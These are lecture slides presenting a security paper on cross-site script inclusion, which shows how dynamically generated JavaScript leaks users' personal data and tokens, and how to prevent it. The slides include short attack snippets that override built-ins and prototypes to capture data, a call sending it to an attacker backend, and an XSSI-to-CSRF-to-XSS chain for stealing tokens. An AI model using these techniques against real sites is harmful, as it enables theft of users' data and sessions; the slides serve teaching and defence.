Slide 1

Slide 1 text

The Unexpected Dangers of Dynamic JavaScript
Sebastian Lekies, Ben Stock, Martin Wentzel, Martin Johns
USENIX Security 2016

Presented by Liang Gong, 2016 Fall
Liang Gong, Electrical Engineering & Computer Science, University of California, Berkeley.

Slide 2

Slide 2 text

Overview
• Technical background: an empirical study on generalized XSSI
• Cross-Site Script Inclusion (XSSI):
  • JSON hijacking
  • JavaScript hijacking
• Generalising XSSI:
  • Dynamic JavaScript files
  • Leaking sensitive data from a JS file
• Evaluation:
  • Top 150 websites ranked by Alexa

Slide 11

Slide 11 text

An Attack Scenario
(Diagram with labels: http://attacker.org/, http://email.com/, http://attacker.org/, JS)
Same-Origin Policy
• Restricts communication of active content to objects that share the same origin
• Origin: protocol, port, and host

Slide 18

Slide 18 text

JSON Hijacking (2006)
(Diagram with labels: http://attacker.org/, http://gmail.com/, http://attacker.org/)
JSON response, a bare array:
  [
    ["John Doe", "[email protected]"],
    ["John Doe", "[email protected]"]
  ]
Attacker's page overrides the Array constructor:
  function Array() {
    // steal data
  }

Slide 19

Slide 19 text

Cross-Site Script Inclusion
• A handful of attack vectors, mostly based on browser quirks
• To leak data from non-JavaScript files (JSON, CSV, etc.)
• Most vectors are fixed in modern browsers

Slide 20

Slide 20 text

Motivation
• Why is there no research on JS files?
• Are there JS files which contain user data?
• Can such data be leaked in a similar way?

Slide 21

Slide 21 text

Empirical Study
Are there JS files which contain user data?
• Sensitive data may be bound to the session
• JS files may be dynamically generated based on cookies
Create a browser extension:
• Monitor all scripts encountered within a session
• Request each script with and without cookies
• Diff the results

Slide 23

Slide 23 text

Empirical Study
Create a browser extension:
• Monitor all scripts encountered within a session
• Request each script with and without cookies
• Diff the results
Registered accounts on the first 150 Alexa top sites. Investigate each site:
• Seed the accounts with personalized data
• Thoroughly interact with the site (through the extension)
• Manually analyze the dynamic JS scripts
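The "request with and without cookies, then diff" step of the extension, as an added example that is not the authors' extension code: it takes two constructed response bodies for the same script URL and reports the string literals that appear only in the cookie-bearing response, classifying them roughly as e-mail or token. The two sample bodies, the function names and the classification rules are the editor's assumptions.

```javascript
// Constructed sample: the same dynamic script fetched with the session cookies
// (logged-in view) and without them (anonymous view).
const WITH_COOKIES = [
  'var isLoggedIn = true;',
  'var user_email = "jane.doe@example.test";',
  'window.csrfToken = "a1b2c3d4e5f60718";',
  'function render() { /* ui code */ }',
].join('\n');

const WITHOUT_COOKIES = [
  'var isLoggedIn = false;',
  'var user_email = "";',
  'window.csrfToken = "";',
  'function render() { /* ui code */ }',
].join('\n');

// A script is state-dependent (slide 26) when the two responses differ at all.
function isStateDependent(authed, anon) {
  return authed !== anon;
}

// Collect non-empty double- or single-quoted string literals from a script body.
function stringLiterals(src) {
  const re = /"([^"\\]*)"|'([^'\\]*)'/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    const s = m[1] !== undefined ? m[1] : m[2];
    if (s.length > 0) out.push(s);
  }
  return out;
}

// Literals present only in the authenticated response are the candidates for
// session-bound data; this is the "diff the results" step.
function leakedLiterals(authed, anon) {
  const anonSet = new Set(stringLiterals(anon));
  return [...new Set(stringLiterals(authed))].filter((s) => !anonSet.has(s));
}

// Coarse labelling mirroring the categories on slide 31 (assumed heuristics):
// identity data (e-mail) versus CSRF/auth tokens (long opaque strings).
function classify(literal) {
  if (/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(literal)) return 'email';
  if (/^[A-Za-z0-9_-]{16,}$/.test(literal)) return 'token';
  return 'other';
}

function analyze(authed, anon) {
  if (!isStateDependent(authed, anon)) return { stateDependent: false, findings: [] };
  const findings = leakedLiterals(authed, anon).map((v) => ({ value: v, kind: classify(v) }));
  return { stateDependent: true, findings };
}

console.log(JSON.stringify(analyze(WITH_COOKIES, WITHOUT_COOKIES), null, 2));
```

A hit here only means the script is session-dependent; whether it is exploitable still depends on the URL being guessable (slide 47) and on how the data is exposed (slides 40 to 46).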

Slide 26

Slide 26 text

State-dependent JS Scripts
Scripts generated based on info in cookies:
• 209 scripts from 49 domains
• 40 domains do not have CSRF tokens for scripts
Script purpose:
• User-specific data: contains email address, preferences, etc.
• Service bootstrapping: contains data API tokens
• Cross-service data sharing: single sign-on

Slide 31

Slide 31 text

Security Sensitive Data in Scripts
(Chart with annotations: login state, e.g., a variable set to true for login; CSRF or auth tokens; name, user id, email address; birthday, location, real name)

Slide 39

Slide 39 text

RQ: Can such data be leaked in a similar way?
(Diagram with labels: http://attacker.org/, http://vuln.com/, http://attacker.org/)
  // 1. insert the script tag
  // 2. observe side effect

Slide 40

Slide 40 text

RQ: Can such data be leaked in a similar way?
Leaking data stored in global variables:
dynamic.js:
  // local variable at top level (still becomes a property of window)
  var first_name = "John";
  // variable missing the "var" keyword
  last_name = "Doe";
  // global variable
  window.user_email = "[email protected]";
evil.js:
  console.log(first_name);
  console.log(last_name);
  console.log(user_email);

Slide 41

Slide 41 text

RQ: Can such data be leaked in a similar way?
Leaking data via global functions:
dynamic.js:
  function example() {
    var email = "[email protected]";
    window.MyLibrary.doSomething(email);
  }
evil.js:
  window.MyLibrary = {};
  window.MyLibrary.doSomething = function (email) {
    console.log(email);
  };

Slide 43

Slide 43 text

RQ: Can such data be leaked in a similar way?
Leaking data via built-in APIs:
dynamic.js:
  function example() {
    var email = "[email protected]";
    JSON.stringify(email);
  }
evil.js:
  JSON.stringify = function (data) {
    sendToAttackerBackend(data);
  };
Other APIs: ArrayBuffer, Map, Set, WeakMap, WeakSet, decodeURI, decodeURIComponent, encodeURI, encodeURIComponent, escape, unescape ...

Slide 44

Slide 44 text

Prototypical Inheritance
  // object1 -> Object.prototype -> null
  var object1 = {a: 1};
  // object2 -> object1 -> Object.prototype -> null
  var object2 = Object.create(object1);
  console.log(object2.a); // prints 1

Slide 46

Slide 46 text

RQ: Can such data be leaked in a similar way?
Leaking data via the this reference:
dynamic.js:
  (function () {
    var secret_values = ["[email protected]", "top secret"];
    secret_values.forEach(function (secret) {
      // do something secret here
    });
  })();
evil.js:
  Array.prototype.forEach = function (callback) {
    console.log(this); // this points to the array
  };
Other APIs: String.prototype.concat, String.prototype.substring, String.prototype.toString, String.prototype.replace, Array.prototype.join, Array.prototype.map, Array.prototype.forEach ...

Slide 47

Slide 47 text

Empirical Study
(Chart with annotations: dynamic scripts based on cookies; CSRF or auth tokens; name, user id, email address; birthday, location, school)
Some scripts are not exploitable because the URL contains a CSRF token and therefore cannot be inserted in the attack page.

Slide 49

Slide 49 text

A Loophole Found on G+
(Diagram with labels: http://attacker.org/, http://attacker.org/)
Leaked variables:
  isLoggedIn = ...
  isPlusUser = ...
  userFirstPartyAuthV2 = ...
Show some phishing link aimed at Google users.

Slide 50

Slide 50 text

Other Leaked Info
• Email address (14 domains)
• Phone number (1 domain)
• Real first name (10 domains)
• Calendar data (1 domain)
This information can be used for:
• User tracking
• Personalized phishing attacks
• Spam email
• Personalized advertisement

Slide 52

Slide 52 text

Leaking Detailed Email Info
From an email service domain:
• The main page previewed the last 5 emails
• Subject, sender, date and msgId

Slide 53

Slide 53 text

Session Hijacking on File Storage Services
(Diagram with labels: http://attacker.org/, http://vuln.com/, http://attacker.org/)
The script leaked the username and session ID. The session ID can be used to access all files on vuln.com.

Slide 54

Slide 54 text

A More Interesting Attack
XSSI -> CSRF -> XSS -> Facebook post
• A news site hosted a script containing the CSRF token
• The CSRF token enabled us to send profile change requests
• In the profile page there was an XSS
• A Facebook auth token was stored inside a cookie

Slide 59

Slide 59 text

XSSI -> CSRF -> XSS -> Facebook post
(Diagram with labels: http://attacker.org/, http://vuln.com/, http://attacker.org/)
Steal the vuln.com CSRF token.
CSRF: http://vuln.com/changeprofile.php?CSRF=...&info=...

Slide 62

Slide 62 text

XSSI -> CSRF -> XSS -> Facebook post
(Diagram with labels: http://attacker.org/, http://vuln.com/, http://vuln.com/profile)
CSRF request: http://vuln.com/changeprofile.php?CSRF=...&info=... with info=JS code
Profile page after the request:
  Name: John Doe
  Email: JS code

Slide 64

Slide 64 text

XSSI -> CSRF -> XSS -> Facebook post
(Diagram with labels: http://attacker.org/, http://vuln.com/, http://vuln.com/profile)
Profile page: Name: John Doe, Email: JS code
Search for Facebook tokens on this page. This site uses SSO through the Facebook API.

Slide 65

Slide 65 text

XSSI -> CSRF -> XSS -> Facebook post
(Diagram with labels: http://attacker.org/, http://vuln.com/, http://vuln.com/profile, http://facebook.com/)
Profile page: Name: John Doe, Email: JS code
Got the token, and interact with Facebook using the token.

Slide 66

Slide 66 text

Empirical Study
Taking over an account at a file hoster:
• Utilized an Ajax-driven Web UI
• An authentication token was required for these XHRs
• The token was provided inside a script file
• Changing the user's password only requires the email (does not require the old password)
• The email is leaked via the script

Slide 67

Slide 67 text

How to prevent?
Prevent the script from being included by a third party:
• Solution 1: Strict referrer checking (error-prone)
• Solution 2: Randomize the script's URL for each user (include tokens)
Separate JavaScript code from sensitive data:
• Create static JS files and load data dynamically at run time
• The data services can be protected via the SOP
Or inline the script with sensitive data into the web page.